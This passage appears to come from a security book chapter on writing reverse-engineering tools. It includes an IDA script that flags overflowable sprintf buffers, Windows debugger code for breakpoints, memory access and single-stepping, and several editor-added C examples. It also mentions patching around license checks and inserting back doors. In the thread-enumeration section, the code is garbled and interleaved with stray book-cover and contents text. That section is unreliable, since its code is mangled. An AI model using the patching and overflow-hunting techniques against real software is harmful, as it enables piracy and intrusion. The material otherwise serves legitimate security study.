                    eb = FindCode(eb, 0); /* backwards */

                    x = GetOpnd(eb,0);
                    if ( x != -1 )
                    {
                        if(strstr(x, my_reg) == 0)
                        {
                            auto my_src;
                            my_src = GetOpnd(eb, 1);

                            /* param 3 is the target buffer */
                            if(3 == param_count)
                            {
                                auto my_loc;
                                auto my_sz;
                                auto frame_sz;

                                my_loc = PrevFunction(eb);
                                fprintf(output_file, "detected subroutine 0x%x\n", my_loc);

                                my_sz = GetFrame(my_loc);
                                fprintf(output_file, "got frame %x\n", my_sz);

                                frame_sz = GetFrameSize(my_loc);
                                fprintf(output_file, "got frame size %d\n", frame_sz);

                                kill_frame_sz = GetFrameLvarSize(my_loc);
                                fprintf(output_file, "got frame lvar size %d\n", kill_frame_sz);

                                my_sz = GetFrameArgsSize(my_loc);
                                fprintf(output_file, "got frame args size %d\n", my_sz);

                                /* this is the target buffer */
                                fprintf(output_file, "%s is the target buffer, in frame size %d bytes\n",
                                        my_src, frame_sz);
                            }

                            /* param 1 is the source buffer */
                            if(1 == param_count)
                            {
                                fprintf(output_file, "%s is the source buffer\n", my_src);
                                if(-1 != strstr(my_src, "arg"))
                                {
                                    fprintf(output_file, "%s is an argument that will overflow if larger than %d bytes!\n",
                                            my_src, kill_frame_sz);
                                }
                            }
                            break;
                        }
                    }
                    max_backtrace--;
                    if(max_backtrace == 0)break;
                }
                eb = ep; /* reset to where we started and continue for next parameter */
                param_count--;
                if(0 == param_count)
                {
                    fprintf(output_file, "Exhausted all parameters\n");
                    return;
                }
            }
            if(ec-- == 0)break; /* max backtrace looking for parameters */
        }
    }

    static main()
    {
        auto ea;
        auto eb;
        auto last_address;
        auto output_file;
        auto file_name;

        /* turn off all dialog boxes for batch processing */
        Batch(0);
        /* wait for autoanalysis to complete */
        Wait();

        ea = MinEA();
        eb = MaxEA();

        output_file = fopen("report_out.txt", "a");
        file_name = GetIdbPath();
        fprintf(output_file, "----------------------------------------------\nFilename: %s\n", file_name);
        fprintf(output_file, "HUNTING FROM %x TO %x\n----------------------------------------------\n", ea, eb);
        while(ea != BADADDR)
        {
            auto my_code;
            last_address=ea;
            //Message("checking %x\n", ea);
            my_code = GetMnem(ea);
            if(0 == strstr(my_code, "call")){
                auto my_op;
                my_op = GetOpnd(ea, 0);
                if(-1 != strstr(my_op, "sprintf")){
                    fprintf(output_file, "Found sprintf call at 0x%x - checking\n", ea);
                    /* 3 parameters, max backtrace of 20 */
                    hunt_address(ea, 3, 20, output_file);
                    fprintf(output_file, "----------------------------------------------\n");
                }
            }
            ea = FindCode(ea, 1);
        }
        fprintf(output_file, "FINISHED at address 0x%x\n----------------------------------------------\n", last_address);
        fclose(output_file);
        Exit(0);
    }

The output produced by this simple batch file is placed in a file called report_out.txt for later

The file looks something like this:



    ---------------------------------------------
    Filename: C:\reversing\of1.idb
    HUNTING FROM 401000 TO 404000
    ---------------------------------------------
    Found sprintf call at 0x401012 - checking
    push number 3, ecx
    detected subroutine 0x401000
    got frame ff00004f
    got frame size 32
    got frame lvar size 28
    got frame args size 0
    [esp+1Ch+var_1C] is the target buffer, in frame size 32 bytes
    push number 2, offset unk_403010
    push number 1, eax
    [esp+arg_0] is the source buffer
    [esp+arg_0] is an argument that will overflow if larger than 28 bytes!
    Exhausted all parameters
    ---------------------------------------------
    Found sprintf call at 0x401035 - checking
    push number 3, ecx
    detected subroutine 0x401020
    got frame ff000052
    got frame size 292
    got frame lvar size 288
    got frame args size 0
    [esp+120h+var_120] is the target buffer, in frame size 292 bytes
    push number 2, offset aSHh
    push number 1, eax
    [esp+arg_0] is the source buffer
    [esp+arg_0] is an argument that will overflow if larger than 288 bytes!
    Exhausted all parameters
    ---------------------------------------------
    FINISHED at address 0x4011b6
    ---------------------------------------------
    ---------------------------------------------
    Filename: C:\winnt\MSAGENT\AGENTCTL.idb
    HUNTING FROM 74c61000 TO 74c7a460
    ----------------------------------------------
    Found sprintf call at 0x74c6e3b6 - checking
    push number 3, eax
    detected subroutine 0x74c6e2f9
    got frame ff000eca
    got frame size 568
    got frame lvar size 552
    got frame args size 8
    [ebp+var_218] is the target buffer, in frame size 568 bytes
    push number 2, offset aD__2d

    push number 1, eax
    [ebp+var_21C] is the source buffer
    Exhausted all parameters
    ---------------------------------------------

Searching the function calls, we see a suspect call to lstrcpy(). Analyzing lots of code automatically is a common trick to look for good starting places, and it turns out to be very useful in practice.
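As an added example (not the book's code), a small C program that reads a report_out.txt written by the hunting script and pulls out, per sprintf call site, the frame sizes and the overflow threshold the script flagged, so a long report can be triaged by the numbers rather than by eye. The report text embedded below is a constructed, abridged copy of the output shown above; the struct and function names are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* One sprintf() call site, as the hunting script writes it to report_out.txt. */
struct hunt_hit {
    unsigned long call_addr;  /* "Found sprintf call at 0x... - checking" */
    int frame_size;           /* "got frame size N" */
    int lvar_size;            /* "got frame lvar size N": the local-variable area */
    int overflow_after;       /* "... will overflow if larger than N bytes!", -1 if none */
};

/* Walk the report line by line; a "Found" line opens a new hit and the lines
   that follow fill it in. Returns the number of hits stored (at most max_hits). */
int parse_report(const char *text, struct hunt_hit *hits, int max_hits)
{
    int n = 0;
    const char *line = text;

    while (line != NULL && *line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[256];
        unsigned long addr;
        int value;
        const char *p;

        if (len >= sizeof buf)
            len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        line = nl ? nl + 1 : NULL;

        if (sscanf(buf, "Found sprintf call at 0x%lx", &addr) == 1) {
            if (n >= max_hits)
                break;                       /* table full: stop rather than mis-attribute */
            hits[n].call_addr = addr;
            hits[n].frame_size = 0;
            hits[n].lvar_size = 0;
            hits[n].overflow_after = -1;
            n++;
        } else if (n == 0) {
            continue;                        /* banner lines before the first hit */
        } else if (sscanf(buf, "got frame size %d", &value) == 1) {
            hits[n - 1].frame_size = value;
        } else if (sscanf(buf, "got frame lvar size %d", &value) == 1) {
            hits[n - 1].lvar_size = value;
        } else if ((p = strstr(buf, "larger than ")) != NULL &&
                   sscanf(p, "larger than %d bytes", &value) == 1) {
            hits[n - 1].overflow_after = value;
        }
    }
    return n;
}

/* Number of call sites the script flagged with an overflowable argument. */
int count_flagged(const struct hunt_hit *hits, int n)
{
    int flagged = 0;
    for (int i = 0; i < n; i++)
        if (hits[i].overflow_after >= 0)
            flagged++;
    return flagged;
}

/* Constructed input: an abridged copy of the report shown above. */
const char *SAMPLE_REPORT =
    "Filename: C:\\reversing\\of1.idb\n"
    "HUNTING FROM 401000 TO 404000\n"
    "Found sprintf call at 0x401012 - checking\n"
    "got frame size 32\n"
    "got frame lvar size 28\n"
    "got frame args size 0\n"
    "[esp+arg_0] is an argument that will overflow if larger than 28 bytes!\n"
    "Found sprintf call at 0x401035 - checking\n"
    "got frame size 292\n"
    "got frame lvar size 288\n"
    "[esp+arg_0] is an argument that will overflow if larger than 288 bytes!\n"
    "Found sprintf call at 0x74c6e3b6 - checking\n"
    "got frame size 568\n"
    "got frame lvar size 552\n"
    "Exhausted all parameters\n"
    "FINISHED at address 0x4011b6\n";

int main(void)
{
    struct hunt_hit hits[64];
    int n = parse_report(SAMPLE_REPORT, hits, 64);

    printf("%d sprintf call sites, %d flagged\n", n, count_flagged(hits, n));
    for (int i = 0; i < n; i++)
        printf("  0x%lx frame=%d lvar=%d%s\n", hits[i].call_addr, hits[i].frame_size,
               hits[i].lvar_size, hits[i].overflow_after >= 0 ? "  OVERFLOW CANDIDATE" : "");
    return 0;
}
```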

Writing Your Own Cracking Tools

Reverse engineering is mostly a tedious sport consisting of thousands of small steps and encompassing bazillions of facts. The human mind cannot manage all the data needed to do this in a reasonable way. If you're like most people, you are going to need tools to help you manage all the data. There are quite a number of debugging tools available on the market and in freeware form; sadly, most of them do not present a complete solution. For this reason, you are likely to need to write your own tools.

Coincidentally, writing tools is a great way to learn about software. Writing tools requires a real understanding of the architecture of software—most important, how software tends to be structured in memory and how the heap and stack operate. Learning by writing tools is more efficient than a blind brute-force approach using pencil and paper. Your skills will be better honed by tool creation and the larval stage (learning period) will not take as long.

x86 Tools

The most common processor in most workstations seems to be the Intel x86 family, which includes the 386, 486, and Pentium chips. Other manufacturers also make compatible chips. The chips are a family because they have a subset of features that are common to all the processors. This subset is called the x86 feature set. A program that is running on an x86 processor will usually have a stack, a heap, and a set of instructions. The x86 processor has registers that contain memory addresses. These addresses indicate the location in memory where important data structures reside.

The Basic x86 Debugger

Microsoft supplies a relatively easy-to-use debugging API for Windows. The API allows you to access debugging events from a user-mode program using a simple loop. The structure of the program is quite simple:

    DEBUG_EVENT dbg_evt;
    m_hProcess = OpenProcess( PROCESS_ALL_ACCESS | PROCESS_VM_OPERATION,
                              0,
                              mPID);
    if(m_hProcess == NULL)
    {
        _error_out("[!] OpenProcess Failed !\n");
        return;
    }

    // Alright, we have the process opened; time to start debugging.
    if(!DebugActiveProcess(mPID))
    {
        _error_out("[!] DebugActiveProcess failed !\n");
        return;
    }

    // Don't kill the process on thread exit.
    // Note: only supported on Windows XP.
    fDebugSetProcessKillOnExit(FALSE);

    while(1)
    {
        if(WaitForDebugEvent(&dbg_evt, DEBUGLOOP_WAIT_TIME))
        {
            // Handle the debug events.
            OnDebugEvent(dbg_evt);

            if(!ContinueDebugEvent( mPID,
                                    dbg_evt.dwThreadId,
                                    DBG_CONTINUE))
            {
                _error_out("ContinueDebugEvent failed\n");
                break;
            }
        }
        else
        {
            // Ignore timeout errors (121 is ERROR_SEM_TIMEOUT).
            int err = GetLastError();
            if(121 != err)
            {
                _error_out("WaitForDebugEvent failed\n");
                break;
            }
        }

        // Exit if debugger has been disabled.
        if(FALSE == mDebugActive)
        {
            break;
        }
    }

    RemoveAllBreakPoints();

This code shows how you can connect to an already running process. You can also launch a process in debug mode. Either way, the debugging loop is the same: You simply wait for debug events. The loop continues until there is an error or the mDebugActive flag is set to TRUE. In either case, once the debugger exits, the debugger is automatically detached from the process. If you are running Windows XP, the debugger is detached gracefully and the target process can continue executing. If you are on an older version of Windows, the debugger API will kill the patient (the target process dies). In fact, it is considered quite annoying that the debugger API kills the target process on detach! In some people's opinion this was a serious design flaw of the Microsoft debugging API that should have been fixed in version 0.01. Fortunately, this has finally been fixed in the Windows XP version.

On Breakpoints

Breakpoints are central to debugging. Elsewhere in the book you will find references to standard breakpoint techniques. A breakpoint can be issued using a simple instruction. The standard breakpoint instruction under x86 seems to be interrupt 3. The nice thing about interrupt 3 is that it can be coded as a single byte of data. This means it can be patched over existing code with minimal concern for the surrounding code bytes. This breakpoint is easy to set in code by copying the original byte to a safe location and replacing it with the byte 0xCC. Breakpoint instructions are sometimes globbed together into blocks and are written to invalid regions of memory. Thus, if the program "accidentally" jumps to one of these invalid locations, the debug interrupt will fire. You sometimes see this on the program stack in regions between stack frames.

Of course, interrupt 3 doesn't have to be the way a breakpoint is handled. It could just as easily be interrupt 1, or anything for that matter. The interrupts are software driven and the software of the OS decides how it will handle the event. This is controlled via the interrupt descriptor table (when the processor is running in protected mode) or the interrupt vector table (when running in real mode). To set a breakpoint, you must first save the original instruction you are replacing, then when you remove the breakpoint you can put the saved instruction back in its original location. The following code illustrates saving the original value before setting a breakpoint:

    ////////////////////////////////////////////////////////////////////////////////
    // Change the page protection so we can read the original target instruction,
    // then change it back when we are done.
    ////////////////////////////////////////////////////////////////////////////////
    MEMORY_BASIC_INFORMATION mbi;
    VirtualQueryEx( m_hProcess,
                    (void *)(m_bp_address),
                    &mbi,
                    sizeof(MEMORY_BASIC_INFORMATION));

    // Now read the original byte.
    if(!ReadProcessMemory(m_hProcess,
                          (void *)(m_bp_address),
                          &(m_original_byte),
                          1,
                          NULL))
    {
        _error_out("[!] Failed to read process memory ! \n");
        return NULL;
    }

    if(m_original_byte == 0xCC)
    {
        _error_out("[!] Multiple setting of the same breakpoint ! \n");
        return NULL;
    }

    DWORD dwOldProtect;
    // Change protection back.
    if(!VirtualProtectEx( m_hProcess,
                          mbi.BaseAddress,
                          mbi.RegionSize,
                          mbi.Protect,
                          &dwOldProtect ))
    {
        _error_out("VirtualProtect failed!");
        return NULL;
    }

    SetBreakpoint();

The previous code alters the memory protection so we can read the target address. It stores the original data byte. The following code then overwrites the memory with a 0xCC instruction. Notice that we check the memory to determine whether a breakpoint was already set before we arrived.

    bool SetBreakpoint()
    {
        char a_bpx = '\xCC';

        if(!m_hProcess)
        {
            _error_out("Attempt to set breakpoint without target process");
            return FALSE;
        }

        ////////////////////////////////////////////////////////////////////////////
        // Change the page protection so we can write, then change it back.
        ////////////////////////////////////////////////////////////////////////////
        MEMORY_BASIC_INFORMATION mbi;
        VirtualQueryEx( m_hProcess,
                        (void *)(m_bp_address),
                        &mbi,
                        sizeof(MEMORY_BASIC_INFORMATION));

        if(!WriteProcessMemory(m_hProcess,
                               (void *)(m_bp_address),
                               &a_bpx,
                               1,
                               NULL))
        {
            char _c[255];
            sprintf(_c,
                    "[!] Failed to write process memory, error %d ! \n",
                    GetLastError());
            _error_out(_c);
            return FALSE;
        }

        if(!m_persistent)
        {
            m_refcount++;
        }

        DWORD dwOldProtect;
        // Change protection back.
        if(!VirtualProtectEx( m_hProcess,
                              mbi.BaseAddress,
                              mbi.RegionSize,
                              mbi.Protect,
                              &dwOldProtect ))
        {
            _error_out("VirtualProtect failed!");
            return FALSE;
        }

        // TODO: Flush instruction cache (FlushInstructionCache()).
        return TRUE;
    }

The previous code writes to the target process memory a single 0xCC byte. As an instruction, this is translated as an interrupt 3. We must first change the page protection of the target memory so we can write to it. We change the protection back to the original value before allowing the program to continue. The API calls used here are fully documented in Microsoft Developer Network (MSDN) and we encourage you to check them out there.
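The bookkeeping that the two snippets above share (save the original byte, write 0xCC, refuse a double set, restore everything before detaching, and back EIP up by one after the trap fires) is collected in the added example below, written for this edit and not taken from the book. It works on a plain byte buffer standing in for the target process, filled with constructed bytes, so the ReadProcessMemory/WriteProcessMemory calls of the real tool become array accesses; the names bp_set, bp_remove_all and bp_resume_address are this example's own.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define INT3   0xCC   /* the one-byte x86 breakpoint instruction */
#define MAX_BP 16

/* Stand-in for the debuggee: a plain byte buffer. In the real tool the two
   t->mem[] accesses below are the ReadProcessMemory / WriteProcessMemory calls. */
struct target { uint8_t *mem; size_t size; };

struct breakpoint { size_t address; uint8_t original_byte; };

struct debugger {
    struct target *t;
    struct breakpoint bp[MAX_BP];
    int count;
};

static int find_bp(const struct debugger *d, size_t address)
{
    for (int i = 0; i < d->count; i++)
        if (d->bp[i].address == address)
            return i;
    return -1;
}

/* Save the original byte, then patch in 0xCC. Refuses an address that is out of range,
   already in our table, or already holding 0xCC (the "multiple setting" check above). */
bool bp_set(struct debugger *d, size_t address)
{
    if (address >= d->t->size || d->count >= MAX_BP) return false;
    if (find_bp(d, address) >= 0) return false;
    uint8_t orig = d->t->mem[address];
    if (orig == INT3) return false;          /* also keeps us off pre-existing INT3 padding */
    d->bp[d->count].address = address;
    d->bp[d->count].original_byte = orig;
    d->count++;
    d->t->mem[address] = INT3;
    return true;
}

/* Put the saved byte back and forget the breakpoint. */
bool bp_remove(struct debugger *d, size_t address)
{
    int i = find_bp(d, address);
    if (i < 0) return false;
    d->t->mem[address] = d->bp[i].original_byte;
    d->bp[i] = d->bp[d->count - 1];   /* swap-remove; table order does not matter */
    d->count--;
    return true;
}

/* What RemoveAllBreakPoints() has to do before the debugger detaches: restore every
   patched byte so the target keeps running. Returns the number restored. */
int bp_remove_all(struct debugger *d)
{
    int n = 0;
    while (d->count > 0) {
        bp_remove(d, d->bp[d->count - 1].address);
        n++;
    }
    return n;
}

/* After an INT3 trap the reported EIP is one past the 0xCC. If the trap is ours, return
   the address to set EIP back to (SetEIP's job); otherwise SIZE_MAX: not our exception. */
size_t bp_resume_address(const struct debugger *d, size_t trap_eip)
{
    if (trap_eip == 0) return SIZE_MAX;
    return find_bp(d, trap_eip - 1) >= 0 ? trap_eip - 1 : SIZE_MAX;
}

/* Constructed image: push ebp / mov ebp,esp / sub esp,20h / nop / int3 int3 / ret */
static uint8_t image[10] = { 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x20, 0x90, 0xCC, 0xCC, 0xC3 };

/* Run the breakpoint lifecycle over the image; returns how many of the 8 expected
   outcomes held. The image is restored at the end, so the function is rerunnable. */
int breakpoint_scenario(void)
{
    struct target t = { image, sizeof image };
    struct debugger d = { .t = &t };
    int ok = 0;
    ok += bp_set(&d, 3) == true;                 /* patch the sub esp,20h */
    ok += image[3] == INT3;
    ok += bp_set(&d, 3) == false;                /* same address twice: refused */
    ok += bp_set(&d, 7) == false;                /* pre-existing 0xCC: refused */
    ok += bp_resume_address(&d, 4) == 3;         /* trap at 4 -> resume at 3 */
    ok += bp_resume_address(&d, 8) == SIZE_MAX;  /* padding int3 is not ours */
    ok += bp_set(&d, 0) == true;
    ok += bp_remove_all(&d) == 2 && image[3] == 0x83 && image[0] == 0x55;
    return ok;
}

int main(void)
{
    printf("%d of 8 breakpoint checks held\n", breakpoint_scenario());
    return 0;
}
```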

Reading and Writing Memory

Once you have hit a breakpoint, the next task is usually to examine memory. If you want to use some of the debugging techniques discussed in this book you need to examine memory for user-supplied data. Reading and writing to memory is easily accomplished in the Windows environment using a simple API. You can query to see what kind of memory is available and you can also read and write to memory using a set of routines that are similar to memcpy. If you want to query a memory location to determine whether it's valid or what properties are set (read, write, nonpaged, and so on) you can use the VirtualQueryEx routine.

    ////////////////////////////////////////////////////////
    // Check that we can read the target memory address.
    ////////////////////////////////////////////////////////
    bool can_read( CDThread *theThread, void *p )
    {
        bool ret = FALSE;
        MEMORY_BASIC_INFORMATION mbi;

        // VirtualQueryEx returns 0 (and leaves mbi unset) when the query fails.
        int sz = VirtualQueryEx( theThread->m_hProcess,
                                 (void *)p,
                                 &mbi,
                                 sizeof(MEMORY_BASIC_INFORMATION));
        if(sz == 0)
        {
            return FALSE;
        }

        // PAGE_GUARD is a modifier bit OR'ed onto the base protection, so it is
        // masked rather than compared for equality. Read-only pages are rejected
        // here as well, which suits a caller that intends to write too.
        if( (mbi.State == MEM_COMMIT)
            &&
            (mbi.Protect != PAGE_READONLY)
            &&
            (mbi.Protect != PAGE_EXECUTE_READ)
            &&
            !(mbi.Protect & PAGE_GUARD)
            &&
            (mbi.Protect != PAGE_NOACCESS)
            )
        {
            ret = TRUE;
        }
        return ret;
    }

The example function will determine whether the memory address is readable. If you want to read or write to memory you can use the ReadProcessMemory and WriteProcessMemory API calls.
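An added example (not the book's code) that makes the page-protection decision with the flag semantics VirtualQueryEx actually reports: the base protection lives in the low byte of Protect and PAGE_GUARD is a modifier bit above it, so it has to be masked, not compared for equality. The constants are the real winnt.h values, redefined only when not compiling on Windows; the region struct, the sample regions and the names region_readable/region_writable are constructed for this example, and page_can_read restates the can_read() condition above so the two can be compared on the same inputs.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#ifndef _WIN32
/* Values copied from winnt.h so the check compiles and runs off Windows. */
#define MEM_COMMIT              0x1000
#define MEM_RESERVE             0x2000
#define PAGE_NOACCESS           0x01
#define PAGE_READONLY           0x02
#define PAGE_READWRITE          0x04
#define PAGE_WRITECOPY          0x08
#define PAGE_EXECUTE            0x10
#define PAGE_EXECUTE_READ       0x20
#define PAGE_EXECUTE_READWRITE  0x40
#define PAGE_EXECUTE_WRITECOPY  0x80
#define PAGE_GUARD              0x100
#endif

/* The two MEMORY_BASIC_INFORMATION fields the decision depends on. */
struct region { uint32_t state; uint32_t protect; };

/* Protect holds one base value in the low byte plus modifier bits above it
   (PAGE_GUARD is 0x100), so a modifier must be tested with &, not ==. */
static uint32_t base_protect(uint32_t protect) { return protect & 0xFF; }

bool region_readable(const struct region *r)
{
    if (r->state != MEM_COMMIT) return false;     /* reserved/free: no pages behind it */
    if (r->protect & PAGE_GUARD) return false;    /* first touch raises a guard-page exception */
    switch (base_protect(r->protect)) {
    case PAGE_READONLY: case PAGE_READWRITE: case PAGE_WRITECOPY:
    case PAGE_EXECUTE_READ: case PAGE_EXECUTE_READWRITE: case PAGE_EXECUTE_WRITECOPY:
        return true;
    default:                                      /* NOACCESS, execute-only, or 0 */
        return false;
    }
}

bool region_writable(const struct region *r)
{
    if (!region_readable(r)) return false;
    switch (base_protect(r->protect)) {
    case PAGE_READWRITE: case PAGE_WRITECOPY:
    case PAGE_EXECUTE_READWRITE: case PAGE_EXECUTE_WRITECOPY:
        return true;
    default:
        return false;
    }
}

/* The can_read() condition from the page, kept here only for comparison. */
bool page_can_read(const struct region *r)
{
    return r->state == MEM_COMMIT
        && r->protect != PAGE_READONLY
        && r->protect != PAGE_EXECUTE_READ
        && r->protect != PAGE_GUARD
        && r->protect != PAGE_NOACCESS;
}

int main(void)
{
    /* Constructed regions, as VirtualQueryEx might report them. */
    const struct region samples[] = {
        { MEM_COMMIT,  PAGE_READONLY },               /* .rdata */
        { MEM_COMMIT,  PAGE_EXECUTE_READ },           /* .text */
        { MEM_COMMIT,  PAGE_READWRITE },              /* heap / .data */
        { MEM_COMMIT,  PAGE_READWRITE | PAGE_GUARD }, /* stack guard page */
        { MEM_RESERVE, PAGE_NOACCESS },               /* reserved, not committed */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("state=%#x protect=%#x readable=%d writable=%d page_can_read=%d\n",
               samples[i].state, samples[i].protect,
               region_readable(&samples[i]), region_writable(&samples[i]),
               page_can_read(&samples[i]));
    return 0;
}
```

The guard-page row is the one to watch: the equality test lets PAGE_READWRITE | PAGE_GUARD through, and a read there would trip the guard the target's stack growth relies on.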

Debugging Multithreaded Programs

If the program has multiple threads, you can control the behavior of each individual thread (something that is very helpful when attacking more modern code). There are API calls for manipulating the thread. Each thread has a CONTEXT. A context is a data structure that controls important process data like the current instruction pointer. By modifying and querying context structures, you can control and track all the threads of a multithreaded program. Here is an example of setting the instruction pointer of a given thread:

    bool SetEIP(DWORD theEIP)
    {
        CONTEXT ctx;
        HANDLE hThread = fOpenThread(
                             THREAD_ALL_ACCESS,
                             FALSE,
                             m_thread_id
                             );
        if(hThread == NULL)
        {
            _error_out("[!] OpenThread failed ! \n");
            return FALSE;
        }

        ctx.ContextFlags = CONTEXT_FULL;
        if(!::GetThreadContext(hThread, &ctx))
        {
            _error_out("[!] GetThreadContext failed ! \n");
            CloseHandle(hThread);   // don't leak the handle on the error path
            return FALSE;
        }

        ctx.Eip = theEIP;
        ctx.ContextFlags = CONTEXT_FULL;
        if(!::SetThreadContext(hThread, &ctx))
        {
            _error_out("[!] SetThreadContext failed ! \n");
            CloseHandle(hThread);
            return FALSE;
        }

        CloseHandle(hThread);
        return TRUE;
    }

From this example you can see how to read and set the thread context structure. The thread context structure is fully documented in the Microsoft header files. Note that the context flag CONTEXT_FULL is set during a get or set operation. This allows you to control all the data values of the thread context structure. Remember to close your thread handle when you are finished with the operation or else you will cause a resource leak problem. The example uses an API call called OpenThread. If you cannot link your program to OpenThread you will need to import the call manually. This has been done in the example, which uses a function pointer named fOpenThread.
To initialize fOpenThread you must import the function pointer directly from KERNEL32.DLL:

    typedef void * (__stdcall *FOPENTHREAD) (
        DWORD dwDesiredAccess,   // Access right
        BOOL bInheritHandle,     // Handle inheritance option
        DWORD dwThreadId         // Thread identifier
    );

    FOPENTHREAD fOpenThread=NULL;

    fOpenThread = (FOPENTHREAD)
                  GetProcAddress(
                      GetModuleHandle("kernel32.dll"),
                      "OpenThread" );
    if(!fOpenThread)
    {
        _error_out("[!] failed to get openthread function!\n");
    }

This is a particularly useful block of code because it illustrates how to define a function and import it from a DLL manually. You may use variations of this syntax for almost any exported DLL function.

Enumerate Threads or Processes

Using the "toolhelp" API that is supplied with Windows you can query all running processes and threads. You can use this code to query all running threads in your debug target.

    // For the target process, build a
    // thread structure for each thread.

HANDLE

hProcessSnap = NULL;

hProcessSnap = CreateToolhelp32Snapshot(

TH32CS_SNAPTHREAD, mPID); if (hProcessSnap == INVALID_HANDLE_VALUE) { • •

Table of Content s

_error_out("toolhelp snap failed\n"); I ndex

Expl oit ing Softw a re How to Br e ak Code

return;

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley

else Pub

Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

{

Pages: 51 2

THREADENTRY32 the; the.dwSize = sizeof(THREADENTRY32); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed o b reak soft war e?hProcessSnap, Th is book p rov ides t he answ er s. BOOL bret = tThread32First( &the); Ex p lo i t in while(bret) g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou { m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he // Create a thread structure. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t if(the.th32OwnerProcessID == mPID) Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem { When net w or k secur it y m ech anisms do n ot w or k CDThread *aThread = new CDThread; At t ack pat t er ns aThread->m_thread_id = the.th32ThreadID; Rev er se engineer in g aThread->m_hProcess = m_hProcess; Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e mThreadList.push_back( aThread ); Tech niqu es f or cr aft ing m aliciou s inpu t } The t echn ical det ails of b uf fer ov er f low s Root k it s bret = Thread32Next(hProcessSnap, &the); Ex p lo i t in } g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. }

In this example, a CDThread object is being built and initialized for each thread. The thread structure that is obtained, THREADENTRY32, has many interesting values to the debugger. We encourage you to reference the Microsoft documentation on this API. Note that the code checks the owner process identification (PID) for each thread to make sure it belongs to the debug target process.

Single Stepping

Tracing the flow of program execution is very important when you want to know if the attacker (maybe you) can control logic. For example, if the 13th byte of the packet is being passed to a switch statement, the attacker controls the switch statement by virtue of the fact that the attacker controls the 13th byte of the packet.

Single stepping is a feature of the x86 chipset. There is a special flag (called TRAP FLAG) in the processor that, if set, will cause only a single instruction to be executed followed by an interrupt. Using the single-step interrupt, a debugger can examine each and every instruction that is executing. You can also examine memory at each step using the routines listed earlier. In fact, this is exactly what a tool called The PIT does.[15] These techniques are all fairly simple, but when properly combined, they result in a very powerful debugger.

[15] The PIT tool is available at http://www.hbgary.com.

To put the processor into single step, you must set the single-step flag. The following code illustrates how to do this:

// Trap flag: bit 8 of EFLAGS (the definition is not shown on the page).
#define TF_BIT 0x100

bool SetSingleStep()
{
    CONTEXT ctx;
    HANDLE hThread = fOpenThread(
        THREAD_ALL_ACCESS,
        FALSE,
        m_thread_id
    );

    if(hThread == NULL)
    {
        _error_out("[!] Failed to Open the BPX thread !\n");
        return FALSE;
    }

    // Rewind one instruction. This means no manual snapshots anymore.
    ctx.ContextFlags = CONTEXT_FULL;
    if(!::GetThreadContext(hThread, &ctx))
    {
        _error_out("[!] GetThreadContext failed ! \n");
        CloseHandle(hThread);   // do not leak the handle on the error path
        return FALSE;
    }

    // Set single step for this thread.
    ctx.EFlags |= TF_BIT;
    ctx.ContextFlags = CONTEXT_FULL;
    if(!::SetThreadContext(hThread, &ctx))
    {
        _error_out("[!] SetThreadContext failed ! \n");
        CloseHandle(hThread);
        return FALSE;
    }

    CloseHandle(hThread);
    return TRUE;
}

Note that we influence the trace flag by using the thread context structures. The thread ID is stored in a variable called m_thread_id. To single step a multithreaded program, all threads must be set to single step.

Patching

If you are using our kind of breakpoints, you have already experienced patching. By reading the original byte of an instruction and replacing it with 0xCC, you patched the original program! Of course the technique can be used to patch in much more than a single instruction. Patching can be used to insert branching statements, new code blocks, and even to overwrite static data. Patching is one way that software pirates have cracked digital copyright mechanisms. In fact, many interesting things are made possible by changing only a single jump statement. For example, if a program has a block of code that checks the license file, all the software pirate needs to do is insert a jump that branches around the license check.[16] If you are interested in software cracking, there are literally thousands of documents on the Net published on the subject. These are easily located on the Internet by googling "software cracking."

[16] This very basic approach is no longer used much in practice. More complicated schemes are discussed in Building Secure Software [Viega and McGraw, 2001].

Patching is an important skill to learn. It allows you, in many cases, to fix a software bug. Of course, it also allows you to insert a software bug. You may know that a certain file is being used by the server version of your target. You can insert a helpful back door using patching techniques. There is a good example of a software patch (patching the NT kernel) discussed in Chapter 8.

Fault Injection

Fault injection can take many forms [Voas and McGraw, 1999]. At its most basic, the idea is simply to supply strange or unexpected inputs to a software program and see what happens. Variations of the technique involve mutating the code and injecting corruption into the data heap or program stack. The goal is to cause the software to fail in interesting ways. Using fault injection, software will always fail. The question is how does it fail? Does the software fail in a way that allows an attacker to gain access to the system? Does the software reveal secret information? Does the failure result in a cascade failure that affects other parts of the system? Failures that do not cause damage to the system indicate a fault-tolerant system.

Fault injection is one of the most powerful testing methodologies ever invented, yet it remains one of the most underused by commercial software vendors. This is one of the reasons why commercial software has so many bugs today. Many so-called software engineers subscribe to the philosophy that a rigid software development process necessarily results in secure and bug-free code, but the real world has shown us repeatedly that without a solid testing strategy, code will always have dangerous bugs. It's almost amusing (from an attacker's perspective) to know that software testing is still receiving the most meager of budgets in most software houses today. This means the world will belong to the attackers for many years to come.

Fault injection on software input is a good way to test for vulnerabilities. The reason is simple: The attacker controls the software input, so it's natural to test every possible input combination that an attacker can supply. Eventually you are bound to find a combination that exploits the software, right?![17]

[17] Of course not! But the technique does actually work in some cases.

Process Snapshots

